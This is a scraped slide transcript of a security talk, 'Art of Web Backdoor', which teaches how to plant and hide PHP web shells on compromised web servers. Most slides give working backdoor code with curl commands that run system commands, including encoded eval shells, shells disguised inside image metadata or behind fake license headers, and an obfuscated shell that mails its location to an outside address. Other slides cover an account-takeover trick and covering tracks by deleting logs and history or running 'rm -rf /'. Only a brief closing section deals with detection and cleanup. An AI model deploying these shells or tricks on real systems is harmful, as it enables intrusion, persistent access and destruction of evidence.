![IPB - Bad Sanitization
Invision Power Board <= 3.4.4
Released on : 2013/05/13 by @johnjean
Logical Vulnerability + Bad Sanitization
1. Create new user using ..
admin@email.com+[150 spaces]+A
2. MySQL Limitation!
string exceeding 150 characters are truncated
and value will be trim to cause arbitrary user
have same email as admin and change admin pass!](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-12-320.jpg)
![Simple PHP Backdoor
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die();
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
$ curl -d “cat+/etc/passwd” http://target.com/simple-backdoor.php](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-15-320.jpg)
![Passing variables to
PHP global vars:
$_GET
$_POST
$_COOKIE
$_REQUEST
$_SERVER
[‘HTTP_CMD’]
Communication
$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system
('uname -a;ps -aux');"](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-17-320.jpg)
![base64_decode() + gzinflate()
1. Encode (Attacker Client)
$ php -r "echo base64_encode(gzdeflate('system("id")'));"
K64sLknN1VDKTFHSBAA=
2. Send (Attacker Client)
$ curl -A- -vvv 127.0.0.1/test3.php -d
"cmd=K64sLknN1VDKTFHSBAA="
3. Decode (PHP Backdoor)
@eval(gzinflate(base64_decode($_POST[“cmd”])));
4. Output
uid=33(www-data) gid=33(www-data) groups=33(www-data)](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-18-320.jpg)
![Code Evaluation besides eval()
1. assert()
assert('sys' . 'tem('.$_POST["cmd"].')');
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
2. preg_replace() with -e modifier (deprecated in PHP 5.5.0)
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' );
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
3. And many more, e.g. OS command executions , check out this link!
http://stackoverflow.com/questions/3115559/exploitable-php-functions](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-19-320.jpg)
;
3. Browse to backdoor and boom!
uid=33(www-data) gid=33(www-data)
groups=33(www-data)](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-21-320.jpg)
![.htaccess + any file format
1. Apache Configuration
AllowOverride All
2. .htaccess
<FilesMatch "2600.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
3. 2600.jpg
<?php @system($_POST["cmd"]); ?>](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-22-320.jpg)
?>
$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-23-320.jpg)
![non-alphabet PHP shell
<?$_="";$_[+""]='';$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
*** This code contains non-printable characters,
it might not work if you copy & paste! ***](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-26-320.jpg)
![Free Kiddies Backdoor!
c99
r57
wso
icfdkshell
weevely
ASPsh
msfpayload
use at your own risk!
Caution!
There are many cases that backdoor
served inside another backdoor *w*)a
e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.
zip
$x10="x6dai154";$x0b=$_SERVER
["x53x45RVE122_x4eAMx45"].$_SERVER
["123103x52Ix50x54_116101115E"];$x0c="
141r162a171040".$x0b;$x0d=array("143x61","x6cx69","
146x77162151x74x65","100","vx65x2e");$x0e=$x0d[2].$x0d
[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
Decoded:
mail(“fwrite@live.ca”,”target/backdoor.php”,”target/backdoor.php”);](https://image.slidesharecdn.com/ihrssjmbqzs39pnjnclw-signature-e3705b777f2710aae02bfaf467fe8ebc92467e9fbdccb0a9e145413cdbc10165-poli-140902123236-phpapp02/85/Art-of-Web-Backdoor-Pichaya-Morimoto-29-320.jpg)
Art of Web Backdoor - Pichaya Morimoto
- 1. Art of Web Backdoor stealth ways to hide your ass in pwned box pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
- 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
- 3. Overview ★ Anatomy of (PHP) Web Hacking ★ Maintaining Access ★ Techniques ★ Covering Tracks ★ Case Studies ★ Detect / Clean up
- 4. How we put web backdoor? High Risk Medium Risk Low Risk OWASP Top Ten 2013 A1-Injection A2-Broken Authentication and Session Management A3-Cross-Site Scripting (XSS) A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
- 5. Public CMS/Plugins PWN 1. Vulnerability Assessment and Mapping ★ Vulnerable version ? Vulnerability exists ? ★ Conditions match ? / Known limitations 2. Exploitation ★ Public exploit available? 2.1 Yes - Just use it ★ Review & test 2.2 No - Source code analysis ★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/ ★ Issue tracker (SVN/GIT repo.) ★ Public / private vulnerability discussion 3. Zero-Day - for l33t h4x0r! ★ Source code analysis without patch, valuable!
- 6. Joomla! - Unauthorised Uploads Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 Fixed Date: 2013-July-31 (2.5.14, 3.1.5) Vulnerable files 1. libraries/joomla/filesystem/file. php 2. administrator/components/com_m edia/helpers/media.php Scenario 1. Joomla! <= 2.5.13 2. User with author privilege 3. OS = Windows Machine or misconfigured Apache + Linux Bypassing File Upload Restrictions in Joomla!
- 7. Known Issues or Limitations
- 8. Backdoor is a Feature for Admin!
- 9. Also in IPB, SMF, vBulletin
- 10. Latest vBulletin 5.0.4 - PHP Module
- 11. Case Study - Official Ubuntu Forums http://www.ubuntuforums.org/ ★ Hacked on 14 July 2013, Defaced on 20 July 2013 ★ 1.82 million users’ data leaked ★ Attacker had full access on Forums app servers ★ Servers running latest version of vBulletin What happened (posted in Canonical Blog) ● A moderator account was hacked ● Attacker post XSS to forum and sent to admin ● 31 seconds .. admin account was PWNED
- 12. IPB - Bad Sanitization Invision Power Board <= 3.4.4 Released on : 2013/05/13 by @johnjean Logical Vulnerability + Bad Sanitization 1. Create new user using .. admin@email.com+[150 spaces]+A 2. MySQL Limitation! string exceeding 150 characters are truncated and value will be trim to cause arbitrary user have same email as admin and change admin pass!
- 13. Other factors 3rd party components ★ uploadify, ckeditor, ckfinder, tinymce, openx Shared Hosting Security ★ Exposed Session Data ★ Improper user privileges (OS/Code execution, critical file manipulation) ★ Vulnerable services (SSH, FTP etc.) MITM, Insider attack, lack of physical access control etc.
- 14. Maintaining Access Add arbitrary accounts (*nix shadow, AD etc.) Reverse Shell and/or Bind Shell using ... ★ Binary/Script Backdoor 1. Bind Port to *nix shell 2. Send *nix shell back to attacker 3. Make a relay tunnel 4. Hidden trigger to spawn shell ★ Web Backdoor - Use less privileged! Connect via HTTP Methods & Headers (GET/POST etc.)
- 15. Simple PHP Backdoor <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die(); } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd $ curl -d “cat+/etc/passwd” http://target.com/simple-backdoor.php
- 16. Hide your ASS
- 17. Passing variables to PHP global vars: $_GET $_POST $_COOKIE $_REQUEST $_SERVER [‘HTTP_CMD’] Communication $ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system ('uname -a;ps -aux');"
- 18. base64_decode() + gzinflate() 1. Encode (Attacker Client) $ php -r "echo base64_encode(gzdeflate('system("id")'));" K64sLknN1VDKTFHSBAA= 2. Send (Attacker Client) $ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA=" 3. Decode (PHP Backdoor) @eval(gzinflate(base64_decode($_POST[“cmd”]))); 4. Output uid=33(www-data) gid=33(www-data) groups=33(www-data)
- 19. Code Evaluation besides eval() 1. assert() assert('sys' . 'tem('.$_POST["cmd"].')'); $ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'" 2. preg_replace() with -e modifier (deprecated in PHP 5.5.0) preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' ); $ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp" 3. And many more, e.g. OS command executions , check out this link! http://stackoverflow.com/questions/3115559/exploitable-php-functions
- 20. Stupid trick! but it’s work! ★ GNU license in beginning of a PHP file! /* Copyright (C) 1991 Free Software Foundation, Inc. This file is part of the GNU C Library. … */ <?php ... ★ PGP Public Key !? /* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.10 (GNU/Linux) ... */ <?php … ★ Software license PROHIBIT to decode ★ More creative filename! ○ lndex.php ○ 1ndex.php ○ index2.php ○ wp-manual.php ○ cat.jpg.php ○ license.txt ○ README.md ○ .bash_profile
- 21. PHP: exif_read_data() 1. Create exif meta-data using exiftool $ exiftool 2600.jpg -Software=system $ exiftool 2600.jpg -Model=id 2. Put 2600.jpg along with backdoor $A = exif_read_data('2600.jpg'); $A['Software']($A['Model']); 3. Browse to backdoor and boom! uid=33(www-data) gid=33(www-data) groups=33(www-data)
- 22. .htaccess + any file format 1. Apache Configuration AllowOverride All 2. .htaccess <FilesMatch "2600.jpg"> SetHandler application/x-httpd-php </FilesMatch> 3. 2600.jpg <?php @system($_POST["cmd"]); ?>
- 23. one statement PHP backdoor <?@$_POST[0]($_POST[1])?> $ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
- 24. Binary Code in PHP Shell
- 25. Binary Code in PHP Shell
- 26. non-alphabet PHP shell <?$_="";$_[+""]='';$_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?> <?=${'_'.$_}['_'](${'_'.$_}['__']);?> $ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a" *** This code contains non-printable characters, it might not work if you copy & paste! ***
- 27. Common survivor feature! work for various type of OS (win/linux/osx ) and ISO ?? find writable directory read/write file merge into every files merge into backup db / files / zip reverse/bind php shell database client File management (symlink?) av/ids/ips/waf detect credential dumper os command network scanner TCP/UDP/HTTP/DNS Amp flood SOCKS Proxy for pivoting HTTP proxy, IRC connect back etc.
- 28. Exploit Pack
- 29. Free Kiddies Backdoor! c99 r57 wso icfdkshell weevely ASPsh msfpayload use at your own risk! Caution! There are many cases that backdoor served inside another backdoor *w*)a e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1. zip $x10="x6dai154";$x0b=$_SERVER ["x53x45RVE122_x4eAMx45"].$_SERVER ["123103x52Ix50x54_116101115E"];$x0c=" 141r162a171040".$x0b;$x0d=array("143x61","x6cx69"," 146x77162151x74x65","100","vx65x2e");$x0e=$x0d[2].$x0d [3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b); Decoded: mail(“fwrite@live.ca”,”target/backdoor.php”,”target/backdoor.php”);
- 30. Covering Tracks ★ root? ★ logs e.g. /var/log/* ★ history e.g. ~/.bash_history ★ self-destruction ★ rm -rf /
- 31. Detect / Prevent ★ Follow secure coding guideline ★ Security hardening checklists ★ Critical File Integrity Monitoring ★ VA / Pentest by certified guys ★ Patch Management & Patch Auditing ★ Centralized Log & WAF? $ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
- 32. MOD_Security ? var_dump(in_array('mod_security2', apache_get_modules ())); print_r(apache_get_modules());
- 33. Clean up 1. Change/reset passwords 2. Review log files 3. Hunting vulnerable apps/backdoors 4. Backup || Recovery $ grep - common danger functions $ find ★ newly created files ★ certain conditions (time/date/permission)
- 34. Practical Hacking? Capture The Flag https://ctftime.org/ Online challenges http://www.root-me.org/en/Challenges/ http://wargame2k10.nuitduhack.com/ http://captf.com/practice-ctf/ http://www.overthewire.org/wargames/natas/ http://www.modsecurity.org/demo/ VM Labs http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html https://pentesterlab.com/exercises/ http://vulnhub.com/ Thanks You !